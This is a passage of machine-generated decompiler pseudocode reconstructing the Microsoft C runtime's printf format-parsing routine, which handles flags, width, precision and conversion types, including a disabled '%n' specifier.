																	goto L32;
																case 5:
																	goto L33;
															}
														case 3:
															L34:
															__edx =  *((char*)(__ebp - 0x251));
															__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
															if( *((char*)(__ebp - 0x251)) != 0x2a) {
																__eax =  *(__ebp - 0x18);
																__eax =  *(__ebp - 0x18) * 0xa;
																__eflags = __eax;
																__ecx =  *((char*)(__ebp - 0x251));
																_t97 = __ecx - 0x30; // -48
																__edx = __eax + _t97;
																 *(__ebp - 0x18) = __eax + _t97;
															} else {
																__eax = __ebp + 0x14;
																 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
																__eflags =  *(__ebp - 0x18);
																if( *(__ebp - 0x18) < 0) {
																	__ecx =  *(__ebp - 0x10);
																	__ecx =  *(__ebp - 0x10) | 0x00000004;
																	__eflags = __ecx;
																	 *(__ebp - 0x10) = __ecx;
																	 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
																	 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
																}
															}
															goto L218;
														case 4:
															L40:
															 *(__ebp - 0x30) = 0;
															goto L218;
														case 5:
															L41:
															__eax =  *((char*)(__ebp - 0x251));
															__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
															if( *((char*)(__ebp - 0x251)) != 0x2a) {
																__edx =  *(__ebp - 0x30);
																__edx =  *(__ebp - 0x30) * 0xa;
																__eflags = __edx;
																_t108 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
																__ecx = __edx + _t108;
																 *(__ebp - 0x30) = __ecx;
															} else {
																__ecx = __ebp + 0x14;
																 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) < 0) {
																	 *(__ebp - 0x30) = 0xffffffff;
																}
															}
															goto L218;
														case 6:
															L47:
															__edx =  *((char*)(__ebp - 0x251));
															 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
															 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
															 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
															__eflags =  *(__ebp - 0x320) - 0x2e;
															if( *(__ebp - 0x320) > 0x2e) {
																L70:
																goto L218;
															}
															L48:
															__ecx =  *(__ebp - 0x320);
															_t116 = __ecx + 0x422b10; // 0x231e9003
															__edx =  *_t116 & 0x000000ff;
															switch( *((intOrPtr*)(( *_t116 & 0x000000ff) * 4 +  &M00422AFC))) {
																case 0:
																	L53:
																	__edx =  *(__ebp + 0xc);
																	__eax =  *( *(__ebp + 0xc));
																	__eflags =  *( *(__ebp + 0xc)) - 0x36;
																	if( *( *(__ebp + 0xc)) != 0x36) {
																		L56:
																		__edx =  *(__ebp + 0xc);
																		__eax =  *( *(__ebp + 0xc));
																		__eflags =  *( *(__ebp + 0xc)) - 0x33;
																		if( *( *(__ebp + 0xc)) != 0x33) {
																			L59:
																			__edx =  *(__ebp + 0xc);
																			__eax =  *( *(__ebp + 0xc));
																			__eflags =  *( *(__ebp + 0xc)) - 0x64;
																			if( *( *(__ebp + 0xc)) == 0x64) {
																				L65:
																				L67:
																				goto L70;
																			}
																			L60:
																			__ecx =  *(__ebp + 0xc);
																			__edx =  *__ecx;
																			__eflags =  *__ecx - 0x69;
																			if( *__ecx == 0x69) {
																				goto L65;
																			}
																			L61:
																			__eax =  *(__ebp + 0xc);
																			__ecx =  *( *(__ebp + 0xc));
																			__eflags = __ecx - 0x6f;
																			if(__ecx == 0x6f) {
																				goto L65;
																			}
																			L62:
																			__edx =  *(__ebp + 0xc);
																			__eax =  *( *(__ebp + 0xc));
																			__eflags =  *( *(__ebp + 0xc)) - 0x75;
																			if( *( *(__ebp + 0xc)) == 0x75) {
																				goto L65;
																			}
																			L63:
																			__ecx =  *(__ebp + 0xc);
																			__edx =  *__ecx;
																			__eflags =  *__ecx - 0x78;
																			if( *__ecx == 0x78) {
																				goto L65;
																			}
																			L64:
																			__eax =  *(__ebp + 0xc);
																			__ecx =  *( *(__ebp + 0xc));
																			__eflags = __ecx - 0x58;
																			if(__ecx != 0x58) {
																				 *(__ebp - 0x25c) = 0;
																				goto L18;
																			}
																			goto L65;
																		}
																		L57:
																		__ecx =  *(__ebp + 0xc);
																		__edx =  *((char*)(__ecx + 1));
																		__eflags =  *((char*)(__ecx + 1)) - 0x32;
																		if( *((char*)(__ecx + 1)) != 0x32) {
																			goto L59;
																		} else {
																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																			__ecx =  *(__ebp - 0x10);
																			__ecx =  *(__ebp - 0x10) & 0xffff7fff;
																			 *(__ebp - 0x10) = __ecx;
																			goto L67;
																		}
																	}
																	L54:
																	__ecx =  *(__ebp + 0xc);
																	__edx =  *((char*)(__ecx + 1));
																	__eflags =  *((char*)(__ecx + 1)) - 0x34;
																	if( *((char*)(__ecx + 1)) != 0x34) {
																		goto L56;
																	} else {
																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																		__ecx =  *(__ebp - 0x10);
																		__ecx =  *(__ebp - 0x10) | 0x00008000;
																		 *(__ebp - 0x10) = __ecx;
																		goto L67;
																	}
																case 1:
																	L68:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																	goto L70;
																case 2:
																	L49:
																	__eax =  *(__ebp + 0xc);
																	__ecx =  *( *(__ebp + 0xc));
																	__eflags = __ecx - 0x6c;
																	if(__ecx != 0x6c) {
																		__ecx =  *(__ebp - 0x10);
																		__ecx =  *(__ebp - 0x10) | 0x00000010;
																		__eflags = __ecx;
																		 *(__ebp - 0x10) = __ecx;
																	} else {
																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																	}
																	goto L70;
																case 3:
																	L69:
																	__eax =  *(__ebp - 0x10);
																	__eax =  *(__ebp - 0x10) | 0x00000800;
																	__eflags = __eax;
																	 *(__ebp - 0x10) = __eax;
																	goto L70;
																case 4:
																	goto L70;
															}
														case 7:
															L71:
															__ecx =  *((char*)(__ebp - 0x251));
															 *(__ebp - 0x324) = __ecx;
															 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
															 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
															__eflags =  *(__ebp - 0x324) - 0x37;
															if( *(__ebp - 0x324) > 0x37) {
																while(1) {
																	L190:
																	__eflags =  *(_t701 - 0x28);
																	if( *(_t701 - 0x28) != 0) {
																		goto L216;
																	}
																	goto L191;
																}
															}
															L72:
															_t157 =  *(__ebp - 0x324) + 0x422b7c; // 0xcccccc0d
															__ecx =  *_t157 & 0x000000ff;
															switch( *((intOrPtr*)(__ecx * 4 +  &M00422B40))) {
																case 0:
																	L123:
																	 *(__ebp - 0x2c) = 1;
																	__ecx =  *((char*)(__ebp - 0x251));
																	__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
																	__eflags = __ecx;
																	 *((char*)(__ebp - 0x251)) = __cl;
																	goto L124;
																case 1:
																	L73:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																	__eflags =  *(__ebp - 0x10) & 0x00000830;
																	if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																		__eax =  *(__ebp - 0x10);
																		__eax =  *(__ebp - 0x10) | 0x00000800;
																		__eflags = __eax;
																		 *(__ebp - 0x10) = __eax;
																	}
																	goto L75;
																case 2:
																	L88:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																	__eflags =  *(__ebp - 0x10) & 0x00000830;
																	if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																		__ecx =  *(__ebp - 0x10);
																		__ecx =  *(__ebp - 0x10) | 0x00000800;
																		__eflags = __ecx;
																		 *(__ebp - 0x10) = __ecx;
																	}
																	goto L90;
																case 3:
																	L147:
																	 *(__ebp - 0x260) = 7;
																	goto L149;
																case 4:
																	L81:
																	__eax = __ebp + 0x14;
																	 *(__ebp - 0x288) = E0041F270(__ebp + 0x14);
																	__eflags =  *(__ebp - 0x288);
																	if( *(__ebp - 0x288) == 0) {
																		L83:
																		__edx =  *0x4bc060; // 0x408114
																		 *(__ebp - 4) = __edx;
																		__eax =  *(__ebp - 4);
																		 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																		L87:
																		goto L190;
																	}
																	L82:
																	__ecx =  *(__ebp - 0x288);
																	__eflags =  *(__ecx + 4);
																	if( *(__ecx + 4) != 0) {
																		L84:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
																		__eflags =  *(__ebp - 0x10) & 0x00000800;
																		if(( *(__ebp - 0x10) & 0x00000800) == 0) {
																			 *(__ebp - 0xc) = 0;
																			__edx =  *(__ebp - 0x288);
																			__eax =  *(__edx + 4);
																			 *(__ebp - 4) =  *(__edx + 4);
																			__ecx =  *(__ebp - 0x288);
																			__edx =  *__ecx;
																			 *(__ebp - 0x24) =  *__ecx;
																		} else {
																			__edx =  *(__ebp - 0x288);
																			__eax =  *(__edx + 4);
																			 *(__ebp - 4) =  *(__edx + 4);
																			__ecx =  *(__ebp - 0x288);
																			__eax =  *__ecx;
																			asm("cdq");
																			 *__ecx - __edx =  *__ecx - __edx >> 1;
																			 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
																			 *(__ebp - 0xc) = 1;
																		}
																		goto L87;
																	}
																	goto L83;
																case 5:
																	L124:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																	__eax = __ebp - 0x248;
																	 *(__ebp - 4) = __ebp - 0x248;
																	 *(__ebp - 0x44) = 0x200;
																	__eflags =  *(__ebp - 0x30);
																	if( *(__ebp - 0x30) >= 0) {
																		L126:
																		__eflags =  *(__ebp - 0x30);
																		if( *(__ebp - 0x30) != 0) {
																			L129:
																			__eflags =  *(__ebp - 0x30) - 0x200;
																			if( *(__ebp - 0x30) > 0x200) {
																				 *(__ebp - 0x30) = 0x200;
																			}
																			L131:
																			__eflags =  *(__ebp - 0x30) - 0xa3;
																			if( *(__ebp - 0x30) > 0xa3) {
																				 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																				 *(__ebp - 0x20) = L0040E5B0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																				__eflags =  *(__ebp - 0x20);
																				if( *(__ebp - 0x20) == 0) {
																					 *(__ebp - 0x30) = 0xa3;
																				} else {
																					__eax =  *(__ebp - 0x20);
																					 *(__ebp - 4) =  *(__ebp - 0x20);
																					 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																					 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																				}
																			}
																			 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																			 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																			__eax =  *(__ebp + 0x14);
																			__ecx =  *(__eax - 8);
																			__edx =  *(__eax - 4);
																			 *(__ebp - 0x2a8) =  *(__eax - 8);
																			 *(__ebp - 0x2a4) =  *(__eax - 4);
																			__ecx = __ebp - 0x40;
																			_push(E004103A0(__ebp - 0x40));
																			__eax =  *(__ebp - 0x2c);
																			_push( *(__ebp - 0x2c));
																			__ecx =  *(__ebp - 0x30);
																			_push( *(__ebp - 0x30));
																			__edx =  *((char*)(__ebp - 0x251));
																			_push( *((char*)(__ebp - 0x251)));
																			__eax =  *(__ebp - 0x44);
																			_push( *(__ebp - 0x44));
																			__ecx =  *(__ebp - 4);
																			_push( *(__ebp - 4));
																			__edx = __ebp - 0x2a8;
																			_push(__ebp - 0x2a8);
																			__eax =  *0x4bb808; // 0x776010b9
																			__eax =  *__eax();
																			__esp = __esp + 0x1c;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																			__eflags =  *(__ebp - 0x10) & 0x00000080;
																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																				__eflags =  *(__ebp - 0x30);
																				if( *(__ebp - 0x30) == 0) {
																					__ecx = __ebp - 0x40;
																					_push(E004103A0(__ebp - 0x40));
																					__edx =  *(__ebp - 4);
																					_push( *(__ebp - 4));
																					__eax =  *0x4bb814; // 0x776010b9
																					__eax =  *__eax();
																					__esp = __esp + 8;
																				}
																			}
																			__ecx =  *((char*)(__ebp - 0x251));
																			__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
																			if( *((char*)(__ebp - 0x251)) == 0x67) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																				__eflags =  *(__ebp - 0x10) & 0x00000080;
																				if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																					__ecx = __ebp - 0x40;
																					_push(E004103A0(__ebp - 0x40));
																					__eax =  *(__ebp - 4);
																					_push( *(__ebp - 4));
																					__ecx =  *0x4bb810; // 0x776010b9
																					E00411D00(__ecx) =  *__eax();
																					__esp = __esp + 8;
																				}
																			}
																			__edx =  *(__ebp - 4);
																			__eax =  *( *(__ebp - 4));
																			__eflags =  *( *(__ebp - 4)) - 0x2d;
																			if( *( *(__ebp - 4)) == 0x2d) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																				__edx =  *(__ebp - 4);
																				__edx =  *(__ebp - 4) + 1;
																				__eflags = __edx;
																				 *(__ebp - 4) = __edx;
																			}
																			__eax =  *(__ebp - 4);
																			 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																			do {
																				L190:
																				__eflags =  *(_t701 - 0x28);
																				if( *(_t701 - 0x28) != 0) {
																					goto L216;
																				}
																				goto L191;
																			} while ( *(__ebp - 0x324) > 0x37);
																			goto L72;
																		}
																		L127:
																		__ecx =  *((char*)(__ebp - 0x251));
																		__eflags = __ecx - 0x67;
																		if(__ecx != 0x67) {
																			goto L129;
																		}
																		L128:
																		 *(__ebp - 0x30) = 1;
																		goto L131;
																	}
																	L125:
																	 *(__ebp - 0x30) = 6;
																	goto L131;
																case 6:
																	L75:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
																	__eflags =  *(__ebp - 0x10) & 0x00000810;
																	if(( *(__ebp - 0x10) & 0x00000810) == 0) {
																		__ebp + 0x14 = E0041F270(__ebp + 0x14);
																		 *(__ebp - 0x284) = __ax;
																		__cl =  *(__ebp - 0x284);
																		 *(__ebp - 0x248) = __cl;
																		 *(__ebp - 0x24) = 1;
																	} else {
																		 *(__ebp - 0x280) = 0;
																		__edx = __ebp + 0x14;
																		__eax = E00421650(__ebp + 0x14);
																		 *(__ebp - 0x258) = __ax;
																		__eax =  *(__ebp - 0x258) & 0x0000ffff;
																		__ecx = __ebp - 0x248;
																		__edx = __ebp - 0x24;
																		 *(__ebp - 0x280) = E00424E90(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
																		__eflags =  *(__ebp - 0x280);
																		if( *(__ebp - 0x280) != 0) {
																			 *(__ebp - 0x28) = 1;
																		}
																	}
																	__edx = __ebp - 0x248;
																	 *(__ebp - 4) = __ebp - 0x248;
																	while(1) {
																		L190:
																		__eflags =  *(_t701 - 0x28);
																		if( *(_t701 - 0x28) != 0) {
																			goto L216;
																		}
																		goto L191;
																	}
																case 7:
																	L144:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																	 *((intOrPtr*)(__ebp - 8)) = 0xa;
																	L153:
																	__eflags =  *(_t701 - 0x10) & 0x00008000;
																	if(( *(_t701 - 0x10) & 0x00008000) == 0) {
																		_t649 =  *(_t701 - 0x10) & 0x00001000;
																		__eflags = _t649;
																		if(_t649 == 0) {
																			__eflags =  *(_t701 - 0x10) & 0x00000020;
																			if(( *(_t701 - 0x10) & 0x00000020) == 0) {
																				_t651 =  *(_t701 - 0x10) & 0x00000040;
																				__eflags = _t651;
																				if(_t651 == 0) {
																					_t496 = E0041F270(_t701 + 0x14);
																					_t703 = _t703 + 4;
																					__eflags = 0;
																					 *(_t701 - 0x2b8) = _t496;
																					 *(_t701 - 0x2b4) = 0;
																				} else {
																					_t580 = E0041F270(_t701 + 0x14);
																					_t703 = _t703 + 4;
																					asm("cdq");
																					 *(_t701 - 0x2b8) = _t580;
																					 *(_t701 - 0x2b4) = _t651;
																				}
																			} else {
																				_t698 =  *(_t701 - 0x10) & 0x00000040;
																				__eflags = _t698;
																				if(_t698 == 0) {
																					_t581 = E0041F270(_t701 + 0x14);
																					_t703 = _t703 + 4;
																					asm("cdq");
																					 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
																					 *(_t701 - 0x2b4) = _t698;
																				} else {
																					_t584 = E0041F270(_t701 + 0x14);
																					_t703 = _t703 + 4;
																					asm("cdq");
																					 *(_t701 - 0x2b8) = _t584;
																					 *(_t701 - 0x2b4) = _t698;
																				}
																			}
																		} else {
																			_t587 = E0041F290(_t701 + 0x14);
																			_t703 = _t703 + 4;
																			 *(_t701 - 0x2b8) = _t587;
																			 *(_t701 - 0x2b4) = _t649;
																		}
																	} else {
																		_t588 = E0041F290(_t701 + 0x14);
																		_t703 = _t703 + 4;
																		 *(_t701 - 0x2b8) = _t588;
																		 *(_t701 - 0x2b4) = _t647;
																	}
																	__eflags =  *(_t701 - 0x10) & 0x00000040;
																	if(( *(_t701 - 0x10) & 0x00000040) == 0) {
																		goto L170;
																	}
																case 8:
																	L109:
																	__ecx = __ebp + 0x14;
																	 *(__ebp - 0x298) = E0041F270(__ebp + 0x14);
																	__eax = E00424120();
																	__eflags = __eax;
																	if(__eax != 0) {
																		L119:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																		__eflags =  *(__ebp - 0x10) & 0x00000020;
																		if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																			__edx =  *(__ebp - 0x298);
																			__eax =  *(__ebp - 0x24c);
																			 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
																		} else {
																			__eax =  *(__ebp - 0x298);
																			 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
																		}
																		 *(__ebp - 0x28) = 1;
																		while(1) {
																			L190:
																			__eflags =  *(_t701 - 0x28);
																			if( *(_t701 - 0x28) != 0) {
																				goto L216;
																			}
																			goto L191;
																		}
																	}
																	L110:
																	__edx = 0;
																	__eflags = 0;
																	if(0 == 0) {
																		 *(__ebp - 0x32c) = 0;
																	} else {
																		 *(__ebp - 0x32c) = 1;
																	}
																	__eax =  *(__ebp - 0x32c);
																	 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
																	__eflags =  *(__ebp - 0x29c);
																	if( *(__ebp - 0x29c) == 0) {
																		_push(L"(\"\'n\' format specifier disabled\", 0)");
																		_push(0);
																		_push(0x695);
																		_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																		_push(2);
																		__eax = L0040C820();
																		__esp = __esp + 0x14;
																		__eflags = __eax - 1;
																		if(__eax == 1) {
																			asm("int3");
																		}
																	}
																	__eflags =  *(__ebp - 0x29c);
																	if( *(__ebp - 0x29c) != 0) {
																		L118:
																		while(1) {
																			L190:
																			__eflags =  *(_t701 - 0x28);
																			if( *(_t701 - 0x28) != 0) {
																				goto L216;
																			}
																			goto L191;
																		}
																	} else {
																		L117:
																		 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
																		__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
																		 *(__ebp - 0x2f8) = 0xffffffff;
																		__ecx = __ebp - 0x40;
																		__eax = E00410370(__ecx);
																		__eax =  *(__ebp - 0x2f8);
																		goto L229;
																	}
																case 9:
																	goto L0;
																case 0xa:
																	L146:
																	 *(__ebp - 0x30) = 8;
																	goto L147;
																case 0xb:
																	L90:
																	__eflags =  *(__ebp - 0x30) - 0xffffffff;
																	if( *(__ebp - 0x30) != 0xffffffff) {
																		__edx =  *(__ebp - 0x30);
																		 *(__ebp - 0x328) =  *(__ebp - 0x30);
																	} else {
																		 *(__ebp - 0x328) = 0x7fffffff;
																	}
																	__eax =  *(__ebp - 0x328);
																	 *(__ebp - 0x290) =  *(__ebp - 0x328);
																	__ecx = __ebp + 0x14;
																	 *(__ebp - 4) = E0041F270(__ebp + 0x14);
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
																	__eflags =  *(__ebp - 0x10) & 0x00000810;
																	if(( *(__ebp - 0x10) & 0x00000810) == 0) {
																		L101:
																		__eflags =  *(__ebp - 4);
																		if( *(__ebp - 4) == 0) {
																			__edx =  *0x4bc060; // 0x408114
																			 *(__ebp - 4) = __edx;
																		}
																		__eax =  *(__ebp - 4);
																		 *(__ebp - 0x28c) =  *(__ebp - 4);
																		while(1) {
																			L104:
																			__ecx =  *(__ebp - 0x290);
																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																			__eflags = __ecx;
																			if(__ecx == 0) {
																				break;
																			}
																			L105:
																			__eax =  *(__ebp - 0x28c);
																			__ecx =  *( *(__ebp - 0x28c));
																			__eflags = __ecx;
																			if(__ecx == 0) {
																				break;
																			}
																			L106:
																			 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
																			 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
																		}
																		L107:
																		__eax =  *(__ebp - 0x28c);
																		__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
																		__eflags = __eax;
																		 *(__ebp - 0x24) = __eax;
																		goto L108;
																	} else {
																		L94:
																		__eflags =  *(__ebp - 4);
																		if( *(__ebp - 4) == 0) {
																			__eax =  *0x4bc064; // 0x408104
																			 *(__ebp - 4) = __eax;
																		}
																		 *(__ebp - 0xc) = 1;
																		__ecx =  *(__ebp - 4);
																		 *(__ebp - 0x294) =  *(__ebp - 4);
																		while(1) {
																			L97:
																			__edx =  *(__ebp - 0x290);
																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																			__eflags =  *(__ebp - 0x290);
																			if( *(__ebp - 0x290) == 0) {
																				break;
																			}
																			L98:
																			__ecx =  *(__ebp - 0x294);
																			__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
																			__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
																			if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
																				break;
																			}
																			L99:
																			 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
																			 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
																		}
																		L100:
																		 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
																		__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
																		 *(__ebp - 0x24) = __ecx;
																		L108:
																		while(1) {
																			L190:
																			__eflags =  *(_t701 - 0x28);
																			if( *(_t701 - 0x28) != 0) {
																				goto L216;
																			}
																			goto L191;
																		}
																	}
																case 0xc:
																	L145:
																	 *((intOrPtr*)(__ebp - 8)) = 0xa;
																	while(1) {
																		L153:
																		__eflags =  *(_t701 - 0x10) & 0x00008000;
																		if(( *(_t701 - 0x10) & 0x00008000) == 0) {
																			_t649 =  *(_t701 - 0x10) & 0x00001000;
																			__eflags = _t649;
																			if(_t649 == 0) {
																				__eflags =  *(_t701 - 0x10) & 0x00000020;
																				if(( *(_t701 - 0x10) & 0x00000020) == 0) {
																					_t651 =  *(_t701 - 0x10) & 0x00000040;
																					__eflags = _t651;
																					if(_t651 == 0) {
																						_t496 = E0041F270(_t701 + 0x14);
																						_t703 = _t703 + 4;
																						__eflags = 0;
																						 *(_t701 - 0x2b8) = _t496;
																						 *(_t701 - 0x2b4) = 0;
																					} else {
																						_t580 = E0041F270(_t701 + 0x14);
																						_t703 = _t703 + 4;
																						asm("cdq");
																						 *(_t701 - 0x2b8) = _t580;
																						 *(_t701 - 0x2b4) = _t651;
																					}
																				} else {
																					_t698 =  *(_t701 - 0x10) & 0x00000040;
																					__eflags = _t698;
																					if(_t698 == 0) {
																						_t581 = E0041F270(_t701 + 0x14);
																						_t703 = _t703 + 4;
																						asm("cdq");
																						 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
																						 *(_t701 - 0x2b4) = _t698;
																					} else {
																						_t584 = E0041F270(_t701 + 0x14);
																						_t703 = _t703 + 4;
																						asm("cdq");
																						 *(_t701 - 0x2b8) = _t584;
																						 *(_t701 - 0x2b4) = _t698;
																					}
																				}
																			} else {
																				_t587 = E0041F290(_t701 + 0x14);
																				_t703 = _t703 + 4;
																				 *(_t701 - 0x2b8) = _t587;
																				 *(_t701 - 0x2b4) = _t649;
																			}
																		} else {
																			_t588 = E0041F290(_t701 + 0x14);
																			_t703 = _t703 + 4;
																			 *(_t701 - 0x2b8) = _t588;
																			 *(_t701 - 0x2b4) = _t647;
																		}
																		__eflags =  *(_t701 - 0x10) & 0x00000040;
																		if(( *(_t701 - 0x10) & 0x00000040) == 0) {
																			goto L170;
																		}
																		goto L166;
																	}
																case 0xd:
																	L148:
																	 *(__ebp - 0x260) = 0x27;
																	L149:
																	 *((intOrPtr*)(__ebp - 8)) = 0x10;
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																	__eflags =  *(__ebp - 0x10) & 0x00000080;
																	if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																		 *((char*)(__ebp - 0x14)) = 0x30;
																		 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
																		__eflags =  *(__ebp - 0x260) + 0x51;
																		 *((char*)(__ebp - 0x13)) = __al;
																		 *(__ebp - 0x1c) = 2;
																	}
																	while(1) {
																		L153:
																		__eflags =  *(_t701 - 0x10) & 0x00008000;
																		if(( *(_t701 - 0x10) & 0x00008000) == 0) {
																			_t649 =  *(_t701 - 0x10) & 0x00001000;
																			__eflags = _t649;
																			if(_t649 == 0) {
																				__eflags =  *(_t701 - 0x10) & 0x00000020;
																				if(( *(_t701 - 0x10) & 0x00000020) == 0) {
																					_t651 =  *(_t701 - 0x10) & 0x00000040;
																					__eflags = _t651;
																					if(_t651 == 0) {
																						_t496 = E0041F270(_t701 + 0x14);
																						_t703 = _t703 + 4;
																						__eflags = 0;
																						 *(_t701 - 0x2b8) = _t496;
																						 *(_t701 - 0x2b4) = 0;
																					} else {
																						_t580 = E0041F270(_t701 + 0x14);
																						_t703 = _t703 + 4;
																						asm("cdq");
																						 *(_t701 - 0x2b8) = _t580;
																						 *(_t701 - 0x2b4) = _t651;
																					}
																				} else {
																					_t698 =  *(_t701 - 0x10) & 0x00000040;
																					__eflags = _t698;
																					if(_t698 == 0) {
																						_t581 = E0041F270(_t701 + 0x14);
																						_t703 = _t703 + 4;
																						asm("cdq");
																						 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
																						 *(_t701 - 0x2b4) = _t698;
																					} else {
																						_t584 = E0041F270(_t701 + 0x14);
																						_t703 = _t703 + 4;
																						asm("cdq");
																						 *(_t701 - 0x2b8) = _t584;
																						 *(_t701 - 0x2b4) = _t698;
																					}
																				}
																			} else {
																				_t587 = E0041F290(_t701 + 0x14);
																				_t703 = _t703 + 4;
																				 *(_t701 - 0x2b8) = _t587;
																				 *(_t701 - 0x2b4) = _t649;
																			}
																		} else {
																			_t588 = E0041F290(_t701 + 0x14);
																			_t703 = _t703 + 4;
																			 *(_t701 - 0x2b8) = _t588;
																			 *(_t701 - 0x2b4) = _t647;
																		}
																		__eflags =  *(_t701 - 0x10) & 0x00000040;
																		if(( *(_t701 - 0x10) & 0x00000040) == 0) {
																			goto L170;
																		}
																		goto L166;
																	}
																case 0xe:
																	while(1) {
																		L190:
																		__eflags =  *(_t701 - 0x28);
																		if( *(_t701 - 0x28) != 0) {
																			goto L216;
																		}
																		goto L191;
																	}
															}
														case 8:
															L30:
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
															goto L33;
														case 9:
															L31:
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
															goto L33;
														case 0xa:
															L29:
															__ecx =  *(__ebp - 0x10);
															__ecx =  *(__ebp - 0x10) | 0x00000001;
															 *(__ebp - 0x10) = __ecx;
															goto L33;
														case 0xb:
															L28:
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
															goto L33;
														case 0xc:
															L32:
															__ecx =  *(__ebp - 0x10);
															__ecx =  *(__ebp - 0x10) | 0x00000008;
															__eflags = __ecx;
															 *(__ebp - 0x10) = __ecx;
															goto L33;
														case 0xd:
															L33:
															goto L218;
													}
												} else {
													if(0 == 0) {
														 *(_t701 - 0x314) = 0;
													} else {
														 *(_t701 - 0x314) = 1;
													}
													_t618 =  *(_t701 - 0x314);
													 *(_t701 - 0x278) =  *(_t701 - 0x314);
													if( *(_t701 - 0x278) == 0) {
														_push(L"(\"Incorrect format specifier\", 0)");
														_push(0);
